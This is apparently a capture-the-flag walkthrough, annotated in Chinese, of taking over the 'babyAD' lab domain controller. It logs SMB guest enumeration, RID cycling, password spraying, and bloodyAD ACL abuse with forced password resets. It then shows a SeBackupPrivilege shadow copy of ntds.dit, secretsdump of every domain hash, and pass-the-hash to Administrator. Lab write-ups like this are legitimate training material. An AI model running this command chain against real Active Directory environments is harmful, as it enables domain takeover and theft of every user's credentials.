babyAD

1. User

1.1. 端口扫描

┌──(root㉿kali)-[~/Desktop/machines/babyAD]                                               
└─# nmap 192.168.1.5  --min-rate 10000                                                    
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-03 06:22 EST                           
Nmap scan report for 192.168.1.5                                                          
Host is up (0.00037s latency).                                                            
Not shown: 988 filtered tcp ports (no-response)                                           
PORT     STATE SERVICE                                                                    
53/tcp   open  domain                                                                     
88/tcp   open  kerberos-sec                                                               
135/tcp  open  msrpc                                                                      
139/tcp  open  netbios-ssn                                                                
389/tcp  open  ldap                                                                       
445/tcp  open  microsoft-ds                                                               
464/tcp  open  kpasswd5                                                                   
593/tcp  open  http-rpc-epmap                                                             
636/tcp  open  ldapssl                                                                    
3268/tcp open  globalcatLDAP                                                              
3269/tcp open  globalcatLDAPssl                                                           
5985/tcp open  wsman                                                                      
MAC Address: 00:0C:29:AC:31:59 (VMware)                                                   
                                                                                          
Nmap done: 1 IP address (1 host up) scanned in 5.55 seconds 

┌──(root㉿kali)-[~/Desktop/machines/babyAD]                                                                 
└─# nmap 192.168.1.5 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985 -sCV -O                            
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-03 06:24 EST                                             
Nmap scan report for 192.168.1.5                                                                            
Host is up (0.00051s latency).                                                                              
                                                                                                            
PORT     STATE SERVICE       VERSION                                                                        
53/tcp   open  domain        Simple DNS Plus                                                                
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-03 11:24:28Z)                 
135/tcp  open  msrpc         Microsoft Windows RPC                                                          
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn                                                  
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: babyAD.com0., Site: Default-Fi
rst-Site-Name)                                                                                              
445/tcp  open  microsoft-ds?                                                                                
464/tcp  open  kpasswd5?                                                                                    
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0                                            
636/tcp  open  tcpwrapped                                                                                   
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: babyAD.com0., Site: Default-Fi
rst-Site-Name)                                                                                              
3269/tcp open  tcpwrapped                                                                                   
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                        
|_http-title: Not Found                                                                                     
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                 
MAC Address: 00:0C:29:AC:31:59 (VMware)                                                                     
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port       
Device type: general purpose                                                                                
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)                                               
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_server_201
6                                                                                                           
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windo
ws Server 2016 (91%)                                                                                        
No exact OS matches for host (test conditions non-ideal).                                                   
Network Distance: 1 hop                                                                                     
Service Info: Host: BABYAD; OS: Windows; CPE: cpe:/o:microsoft:windows                                      
                                                                                                            
Host script results:                                                                                        
| smb2-security-mode:                                                                                       
|   3:1:1:                                                                                                  
|_    Message signing enabled and required                                                                  
|_nbstat: NetBIOS name: BABYAD, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:ac:31:59 (VMware)            
| smb2-time:                                                                                                
|   date: 2026-01-03T11:24:33                                                                               
|_  start_date: N/A                                                                                         
                                                                                                            
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .       
Nmap done: 1 IP address (1 host up) scanned in 50.76 seconds     

1.2. SMB

┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u 'guest' -p '' --shares
SMB         192.168.1.5     445    BABYAD           [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.1.5     445    BABYAD           [+] babyAD.com\guest:
SMB         192.168.1.5     445    BABYAD           [*] Enumerated shares
SMB         192.168.1.5     445    BABYAD           Share           Permissions     Remark
SMB         192.168.1.5     445    BABYAD           -----           -----------     ------
SMB         192.168.1.5     445    BABYAD           ADMIN$                          远程管理
SMB         192.168.1.5     445    BABYAD           C$                              默认共享
SMB         192.168.1.5     445    BABYAD           IPC$            READ            远程 IPC
SMB         192.168.1.5     445    BABYAD           NETLOGON                        Logon server share 
SMB         192.168.1.5     445    BABYAD           SYSVOL                          Logon server share 
SMB         192.168.1.5     445    BABYAD           Technical Security Notice READ            
┌──(root㉿kali)-[~/Desktop/machines/babyAD]                                                        
└─# nxc smb 192.168.1.5  -u '' -p '' --generate-hosts-file hosts                                   
SMB         192.168.1.5     445    BABYAD           [*] Windows Server 2022 Build 20348 x64 (name:B
ABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)                            
SMB         192.168.1.5     445    BABYAD           [+] babyAD.com\:                               
                                                                                                   
┌──(root㉿kali)-[~/Desktop/machines/babyAD]                                                        
└─# nxc smb 192.168.1.5  -u '' -p '' --generate-krb5-file /etc/krb5.conf                           
cat SMB         192.168.1.5     445    BABYAD           [*] Windows Server 2022 Build 20348 x64 (na
me:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)                        
SMB         192.168.1.5     445    BABYAD           [+] krb5 conf saved to: /etc/krb5.conf         
SMB         192.168.1.5     445    BABYAD           [+] Run the following command to use the conf f
ile: export KRB5_CONFIG=/etc/krb5.conf                                                             
SMB         192.168.1.5     445    BABYAD           [+] babyAD.com\:                               
h                                                                                                  
                                                                                                   
┌──(root㉿kali)-[~/Desktop/machines/babyAD]                                                        
└─# cat hosts                                                                                      
192.168.1.5     BABYAD.babyAD.com babyAD.com BABYAD                                                
                                                                                                   
┌──(root㉿kali)-[~/Desktop/machines/babyAD]                                                        
└─# cat hosts >> /etc/hosts    
┌──(root㉿kali)-[~/Desktop/machines/babyAD]                                                        
└─# impacket-smbclient 'guest:@192.168.1.5'                                                        
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies                         
                                                                                                   
Password:                                                                                          
Type help for list of commands                                                                     
# shares                                                                                           
ADMIN$                                                                                             
C$                                                                                                 
IPC$                                                                                               
NETLOGON                                                                                           
SYSVOL                                                                                             
Technical Security Notice                                                                          
# use 'Technical Security Notice'                                                                
# use Technical Security Notice                                                                    
# ls                                                                                               
drw-rw-rw-          0  Fri Dec 26 23:10:12 2025 .                                                  
drw-rw-rw-          0  Fri Dec 26 23:27:54 2025 ..                                                 
-rw-rw-rw-       5045  Fri Dec 26 23:10:12 2025 技术安全通告.pdf                                   
# get 技术安全通告.pdf                                                                             
# exit

Pasted image 20260103195226.png

1.3. RID_Cycling

┌──(root㉿kali)-[~/Desktop/machines/babyAD]                                                        
└─# nxc smb 192.168.1.5 -u 'guest' -p '' --rid-brute                                               
SMB         192.168.1.5     445    BABYAD           [*] Windows Server 2022 Build 20348 x64 (name:B
ABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)                            
SMB         192.168.1.5     445    BABYAD           [+] babyAD.com\guest:                          
SMB         192.168.1.5     445    BABYAD           498: BABYAD0\Enterprise Read-only Domain Contro
llers (SidTypeGroup)                                                                               
SMB         192.168.1.5     445    BABYAD           500: BABYAD0\Administrator (SidTypeUser)       
SMB         192.168.1.5     445    BABYAD           501: BABYAD0\Guest (SidTypeUser)               
SMB         192.168.1.5     445    BABYAD           502: BABYAD0\krbtgt (SidTypeUser)              
SMB         192.168.1.5     445    BABYAD           512: BABYAD0\Domain Admins (SidTypeGroup)      
SMB         192.168.1.5     445    BABYAD           513: BABYAD0\Domain Users (SidTypeGroup)       
SMB         192.168.1.5     445    BABYAD           514: BABYAD0\Domain Guests (SidTypeGroup)      
SMB         192.168.1.5     445    BABYAD           515: BABYAD0\Domain Computers (SidTypeGroup)   
SMB         192.168.1.5     445    BABYAD           516: BABYAD0\Domain Controllers (SidTypeGroup) 
SMB         192.168.1.5     445    BABYAD           517: BABYAD0\Cert Publishers (SidTypeAlias)    
SMB         192.168.1.5     445    BABYAD           518: BABYAD0\Schema Admins (SidTypeGroup)      
SMB         192.168.1.5     445    BABYAD           519: BABYAD0\Enterprise Admins (SidTypeGroup)  
SMB         192.168.1.5     445    BABYAD           520: BABYAD0\Group Policy Creator Owners (SidTy
peGroup)                                                                                           
SMB         192.168.1.5     445    BABYAD           521: BABYAD0\Read-only Domain Controllers (SidT
ypeGroup)                                                                                          
SMB         192.168.1.5     445    BABYAD           522: BABYAD0\Cloneable Domain Controllers (SidT
ypeGroup)                                                                                          
SMB         192.168.1.5     445    BABYAD           525: BABYAD0\Protected Users (SidTypeGroup)    
SMB         192.168.1.5     445    BABYAD           526: BABYAD0\Key Admins (SidTypeGroup)         
SMB         192.168.1.5     445    BABYAD           527: BABYAD0\Enterprise Key Admins (SidTypeGrou
p)                                                                                                 
SMB         192.168.1.5     445    BABYAD           553: BABYAD0\RAS and IAS Servers (SidTypeAlias)
SMB         192.168.1.5     445    BABYAD           571: BABYAD0\Allowed RODC Password Replication 
Group (SidTypeAlias)                                                                               
SMB         192.168.1.5     445    BABYAD           572: BABYAD0\Denied RODC Password Replication G
roup (SidTypeAlias)                                                                                
SMB         192.168.1.5     445    BABYAD           1000: BABYAD0\BABYAD$ (SidTypeUser)            
SMB         192.168.1.5     445    BABYAD           1101: BABYAD0\DnsAdmins (SidTypeAlias)         
SMB         192.168.1.5     445    BABYAD           1102: BABYAD0\DnsUpdateProxy (SidTypeGroup)    
SMB         192.168.1.5     445    BABYAD           1103: BABYAD0\acc_admins (SidTypeGroup)        
SMB         192.168.1.5     445    BABYAD           1104: BABYAD0\wackymaker (SidTypeUser)         
SMB         192.168.1.5     445    BABYAD           1105: BABYAD0\babyad-admin (SidTypeUser)       
SMB         192.168.1.5     445    BABYAD           1106: BABYAD0\backup-opt (SidTypeUser)         
SMB         192.168.1.5     445    BABYAD           1107: BABYAD0\server-opt (SidTypeUser)         
SMB         192.168.1.5     445    BABYAD           1108: BABYAD0\accn-opt (SidTypeUser)  
┌──(root㉿kali)-[~/Desktop/machines/babyAD]                                                                                                                                                   
└─# nxc smb 192.168.1.5  -u valid_user.txt -p valid_user.txt --no-bruteforce                                                                                                                  
SMB         192.168.1.5     445    BABYAD           [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)                    
SMB         192.168.1.5     445    BABYAD           [-] babyAD.com\Administrator:Administrator STATUS_LOGON_FAILURE                                                                           
SMB         192.168.1.5     445    BABYAD           [-] babyAD.com\Guest:Guest STATUS_LOGON_FAILURE                                                                                           
SMB         192.168.1.5     445    BABYAD           [-] babyAD.com\krbtgt:krbtgt STATUS_LOGON_FAILURE                                                                                         
SMB         192.168.1.5     445    BABYAD           [-] babyAD.com\BABYAD$:BABYAD$ STATUS_LOGON_FAILURE                                                                                       
SMB         192.168.1.5     445    BABYAD           [-] babyAD.com\wackymaker:wackymaker STATUS_PASSWORD_MUST_CHANGE                                                                          
SMB         192.168.1.5     445    BABYAD           [-] babyAD.com\babyad-admin:babyad-admin STATUS_LOGON_FAILURE                                                                             
SMB         192.168.1.5     445    BABYAD           [-] babyAD.com\backup-opt:backup-opt STATUS_LOGON_FAILURE                                                                                 
SMB         192.168.1.5     445    BABYAD           [-] babyAD.com\server-opt:server-opt STATUS_LOGON_FAILURE                                                                                 
SMB         192.168.1.5     445    BABYAD           [-] babyAD.com\accn-opt:accn-opt STATUS_LOGON_FAILURE   

改下密码

┌──(root㉿kali)-[~/Desktop/machines/babyAD]                                                                                
└─# nxc smb 192.168.1.5  -u wackymaker -p wackymaker -M change-password -o NEWPASS=Admin123                                                                                                   
SMB         192.168.1.5     445    BABYAD           [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)                    
SMB         192.168.1.5     445    BABYAD           [-] babyAD.com\wackymaker:wackymaker STATUS_PASSWORD_MUST_CHANGE                                                                          
CHANGE-P... 192.168.1.5     445    BABYAD           [+] Successfully changed password for wackymaker               
┌──(root㉿kali)-[~/Desktop/machines/babyAD]                                                                                                 
└─# nxc smb 192.168.1.5  -u wackymaker -p Admin123                                                                                          
SMB         192.168.1.5     445    BABYAD           [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True)
 (SMBv1:None) (Null Auth:True)                                                                                                              
SMB         192.168.1.5     445    BABYAD           [+] babyAD.com\wackymaker:Admin123                                                      
                                                                                                                                            
┌──(root㉿kali)-[~/Desktop/machines/babyAD]                                                                                                 
└─# nxc winrm 192.168.1.5  -u wackymaker -p Admin123                                                                                        
WINRM       192.168.1.5     5985   BABYAD           [*] Windows Server 2022 Build 20348 (name:BABYAD) (domain:babyAD.com)                   
WINRM       192.168.1.5     5985   BABYAD           [+] babyAD.com\wackymaker:Admin123 (Pwn3d!) 

1.4. winrm

┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# evil-winrm -i 192.168.1.5 -u wackymaker -p Admin123

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\wackymaker\Documents> whoami;hostname
babyad0\wackymaker
babyAD
*Evil-WinRM* PS C:\Users\wackymaker\Documents>
*Evil-WinRM* PS C:\Users\wackymaker\desktop> dir

*Evil-WinRM* PS C:\Users\wackymaker\desktop> gci -path c:\users user.txt


    目录: C:\users


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        12/27/2025  11:55 AM             18 user.txt


*Evil-WinRM* PS C:\Users\wackymaker\desktop> gc c:\users\user.txt
a3f5c9e47d2b1a8f

2. System

2.1. bloodhound

*Evil-WinRM* PS C:\Users\wackymaker\desktop> upload SharpHound.exe                                                                          
Info: Uploading /root/Desktop/machines/babyAD/SharpHound.exe to C:\Users\wackymaker\desktop\SharpHound.exe

Data: 1748308 bytes of 1748308 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\wackymaker\desktop> .\SharpHound.exe -c ALL
2026-01-03T20:09:25.0406600+08:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2026-01-03T20:09:25.1812350+08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL,
 Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService,
SmbInfo, NTLMRegistry
2026-01-03T20:09:25.2125237+08:00|INFORMATION|Initializing SharpHound at 20:09 on 2026/1/3
2026-01-03T20:09:25.2437172+08:00|INFORMATION|Resolved current domain to babyAD.com
2026-01-03T20:09:25.3542563+08:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2026-01-03T20:09:25.4166617+08:00|INFORMATION|Beginning LDAP search for babyAD.com
...

2026-01-03T20:09:31.8660681+08:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2026-01-03T20:09:31.9288670+08:00|INFORMATION|Status: 299 objects finished (+299 49.83333)/s -- Using 72 MB RAM
2026-01-03T20:09:31.9288670+08:00|INFORMATION|Enumeration finished in 00:00:06.5298466
2026-01-03T20:09:32.0071000+08:00|INFORMATION|Saving cache with stats: 20 ID to type mappings.
 0 name to SID mappings.
 1 machine sid mappings.
 3 sid to domain mappings.
 0 global catalog mappings.
2026-01-03T20:09:32.0227859+08:00|INFORMATION|SharpHound Enumeration Completed at 20:09 on 2026/1/3! Happy Graphing!
*Evil-WinRM* PS C:\Users\wackymaker\desktop> dir


    目录: C:\Users\wackymaker\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          1/3/2026   8:09 PM          28121 20260103200926_BloodHound.zip
-a----          1/3/2026   8:09 PM           1566 N2Q4YzlmOWUtOGQxOC00ZmNiLTkzZjktNmJkOGZlYmQ5MzM4.bin
-a----          1/3/2026   8:09 PM        1311232 SharpHound.exe


*Evil-WinRM* PS C:\Users\wackymaker\desktop> download 20260103200926_BloodHound.zip

Info: Downloading C:\Users\wackymaker\desktop\20260103200926_BloodHound.zip to 20260103200926_BloodHound.zip

Info: Download successful!

Pasted image 20260103202201.png
先把自己加到ACC_ADMINS组里面

┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host BABYAD.babyAD.com -d babyAD.com -u 'wackymaker' -p 'Admin123' -k --dc-ip 192.168.1.5 set owner 'ACC_ADMINS' 'wackymaker'
[+] Old owner S-1-5-21-3649830887-1815587496-1699028491-512 is now replaced by wackymaker on ACC_ADMINS

┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host BABYAD.babyAD.com -d babyAD.com -u 'wackymaker' -p 'Admin123' -k --dc-ip 192.168.1.5 add genericAll 'ACC_ADMINS' 'wackymaker'
[+] wackymaker has now GenericAll on ACC_ADMINS

┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host BABYAD.babyAD.com -d babyAD.com -u 'wackymaker' -p 'Admin123' -k --dc-ip 192.168.1.5 add groupMember 'ACC_ADMINS' 'wackymaker'
[+] wackymaker added to ACC_ADMINS

然后改BABYAD-ADM的密码

┌──(root㉿kali)-[~/Desktop/machines/babyAD/ansi-colors]
└─# bloodyAD --host  BABYAD.babyAD.com  -k --dc-ip 192.168.1.5 -d babyAD.com -u 'wackymaker' -p 'Admin123' set password  BABYAD-ADMIN  Admin123
[+] Password changed successfully!

┌──(root㉿kali)-[~/Desktop/machines/babyAD/ansi-colors]
└─# nxc smb 192.168.1.5  -u BABYAD-ADMIN  -p Admin123
SMB         192.168.1.5     445    BABYAD           [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.1.5     445    BABYAD           [+] babyAD.com\BABYAD-ADMIN:Admin123

┌──(root㉿kali)-[~/Desktop/machines/babyAD/ansi-colors]
└─# nxc winrm 192.168.1.5  -u BABYAD-ADMIN  -p Admin123
WINRM       192.168.1.5     5985   BABYAD           [*] Windows Server 2022 Build 20348 (name:BABYAD) (domain:babyAD.com)
WINRM       192.168.1.5     5985   BABYAD           [+] babyAD.com\BABYAD-ADMIN:Admin123 (Pwn3d!)

Pasted image 20260103222124.png
Pasted image 20260103222150.png

┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# bloodyAD --host  BABYAD.babyAD.com  -k --dc-ip 192.168.1.5 -d babyAD.com -u 'BABYAD-ADMIN' -p 'Admin123' set
password  BACKUP-OPT  Admin123
[+] Password changed successfully!

┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5  -u  BACKUP-OPT -p Admin123
SMB         192.168.1.5     445    BABYAD           [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.1.5     445    BABYAD           [+] babyAD.com\BACKUP-OPT:Admin123

*Evil-WinRM* PS C:\Users\backup-opt\Documents> whoami /priv

特权信息
----------------------

特权名                        描述             状态
============================= ================ ======
SeMachineAccountPrivilege     将工作站添加到域 已启用
SeBackupPrivilege             备份文件和目录   已启用
SeRestorePrivilege            还原文件和目录   已启用
SeShutdownPrivilege           关闭系统         已启用
SeChangeNotifyPrivilege       绕过遍历检查     已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集   已启用
*Evil-WinRM* PS C:\Users\backup-opt\Documents>

2.2. 卷影备份

*Evil-WinRM* PS C:\temp> diskshadow /s raj.dsh
Microsoft DiskShadow 版本 1.0
版权所有 (C) 2013 Microsoft Corporation
在计算机上: BABYAD,2026/1/3 23:26:01

-> set context persistent nowriters
-> add volume c: alias raj
-> create
已将卷影 ID {c517776e-4909-438e-939e-9075f39a773a} 的别名 raj 设置为环境变量。
已将卷影集 ID {eeb0e07c-db9d-4383-8ea8-e717ceec7542} 的别名 VSS_SHADOW_SET 设置为环境变量。

正在查询卷影副本集 ID 为 {eeb0e07c-db9d-4383-8ea8-e717ceec7542} 的所有卷影副本

        * 卷影副本 ID = {c517776e-4909-438e-939e-9075f39a773a}          %raj%
                - 卷影副本集: {eeb0e07c-db9d-4383-8ea8-e717ceec7542}    %VSS_SHADOW_SET%
                - 卷影副本原始数 = 1
                - 原始卷名称: \\?\Volume{ed91bad1-0000-0000-0000-500600000000}\ [C:\]
                - 创建时间: 2026/1/3 23:26:01
                - 卷影副本设备名称: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - 原始计算机: babyAD.babyAD.com
                - 服务计算机: babyAD.babyAD.com
                - 未暴露
                - 提供程序 ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - 属性:  No_Auto_Release Persistent No_Writers Differential

已列出的卷影副本数: 1
-> expose %raj% z:
-> %raj% = {c517776e-4909-438e-939e-9075f39a773a}
已成功将卷影副本暴露为 z:\。
->
*Evil-WinRM* PS C:\temp> robocopy /b z:\windows\ntds . ntds.dit

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Windows 的可靠文件复制
-------------------------------------------------------------------------------

  开始时间: 2026年1月3日 23:26:10
        源: z:\windows\ntds\
      目标: C:\temp\

      文件: ntds.dit

      选项: /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

                           1    z:\windows\ntds\
            新文件                16.0 m        ntds.dit
  0.0%
  0.3%
  0.7%
  1.1%
  1.5%
  1.9%
  2.3%
  2.7%
...


------------------------------------------------------------------------------

                  总数        复制        跳过       不匹配        失败        其他
       目录:         1         0         1         0         0         0
       文件:         1         1         0         0         0         0
       字节:   16.00 m   16.00 m         0         0         0         0
       时间:   0:00:00   0:00:00                       0:00:00   0:00:00


       速度:           270,600,258 字节/秒。
       速度:            15,483.871 MB/分钟。
   已结束: 2026年1月3日 23:26:10

*Evil-WinRM* PS C:\temp> reg save hklm\system c:\Temp\system
操作成功完成。

*Evil-WinRM* PS C:\temp> cd C:\Temp
*Evil-WinRM* PS C:\Temp> download ntds.dit

Info: Downloading C:\Temp\ntds.dit to ntds.dit

Info: Download successful!
*Evil-WinRM* PS C:\Temp> download system

Info: Downloading C:\Temp\system to system

Info: Download successful!
*Evil-WinRM* PS C:\Temp>
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# impacket-secretsdump -ntds ntds.dit -system system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x9aec2145c768b9975d683cbd0b2138e0
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: ca0a78b7f0d8e8d570163049c1742318
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bbabdc192282668fe5190ab0c5150b34:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BABYAD$:1000:aad3b435b51404eeaad3b435b51404ee:1eb9a569e97548b6a4629f64979a193c:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6fab09b974ecbb7ba5447a076f494689:::
wackymaker:1104:aad3b435b51404eeaad3b435b51404ee:838e18ea954162b03ddea84fa0284139:::
babyad.com\babyad-admin:1105:aad3b435b51404eeaad3b435b51404ee:656d231c131a8f1ea8fd1138b8185674:::
backup-opt:1106:aad3b435b51404eeaad3b435b51404ee:5ad41e36af059c77865edbc22925c33c:::
server-opt:1107:aad3b435b51404eeaad3b435b51404ee:d99f9d8da6dad6dcae6b0d96104a445b:::
accn-opt:1108:aad3b435b51404eeaad3b435b51404ee:b9a7a7fcc60bdb049811e7c7388112a3:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:0218bc05d978eff9d49b5578b0b82d2b6f6fd19b47b55f91c07a555dac208574
Administrator:aes128-cts-hmac-sha1-96:4f3a074e29171c06ab3db041c1be2128
Administrator:des-cbc-md5:34701ccb6efb9704
BABYAD$:aes256-cts-hmac-sha1-96:37cbade9fb078f11a30748756fd92ff7c64af78ca036f546c7ee10326ee3cf20
BABYAD$:aes128-cts-hmac-sha1-96:d896106e4587e25cb645b44c5f2aef0c
BABYAD$:des-cbc-md5:d3b02ac8106ba89e
krbtgt:aes256-cts-hmac-sha1-96:d24121bf2b99d3645b4d7360107674ba6e9f3c55ba79d3d508906e29f1e8a81e
krbtgt:aes128-cts-hmac-sha1-96:5ed92e70800a8bc3da8e8a9220807d5e
krbtgt:des-cbc-md5:2546020262f197a7
wackymaker:aes256-cts-hmac-sha1-96:9f8fc1b72c86c3881697938460386a078d0e062c07773f60961b5ef037571977
wackymaker:aes128-cts-hmac-sha1-96:2ef671fea3cbc6a11689c264636cf316
wackymaker:des-cbc-md5:0b7a079edae54c9e
babyad.com\babyad-admin:aes256-cts-hmac-sha1-96:29f8a0be305a6a998fd0cb2798e3701f971370c9131d3e2369a13e2750130bc5
babyad.com\babyad-admin:aes128-cts-hmac-sha1-96:63a252cbc4cdc9ceeadea523d04b6673
babyad.com\babyad-admin:des-cbc-md5:f4983204910dbc62
backup-opt:aes256-cts-hmac-sha1-96:e6bd82c49938190ac40fc85355f3c1bb4e8d9739b2e33f9f7d9966b9664cbc12
backup-opt:aes128-cts-hmac-sha1-96:37dc64a75ed9200fcbf844e2d0f4c3ed
backup-opt:des-cbc-md5:98e68c7c892a1fe5
server-opt:aes256-cts-hmac-sha1-96:58ce476e9085de94eefb9fde291703bc6bfc98085f9130fca1af4f17cc9f2f54
server-opt:aes128-cts-hmac-sha1-96:83694fead3994f8afe47736c447dd676
server-opt:des-cbc-md5:2f91d026abdaae08
accn-opt:aes256-cts-hmac-sha1-96:3c0003e231985e6cefb136450c1e3c2c597377f15156402e76c503f7604f5949
accn-opt:aes128-cts-hmac-sha1-96:bfe789b2a8141a2081540ac6262424a9
accn-opt:des-cbc-md5:457acdf425c80d68
[*] Cleaning up...
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# evil-winrm -i 192.168.1.5 -u administrator -H bbabdc192282668fe5190ab0c5150b34

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoamibabyad0\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> gc ../desktop/root.txt6e9d14c2b7f08a53
*Evil-WinRM* PS C:\Users\Administrator\Documents>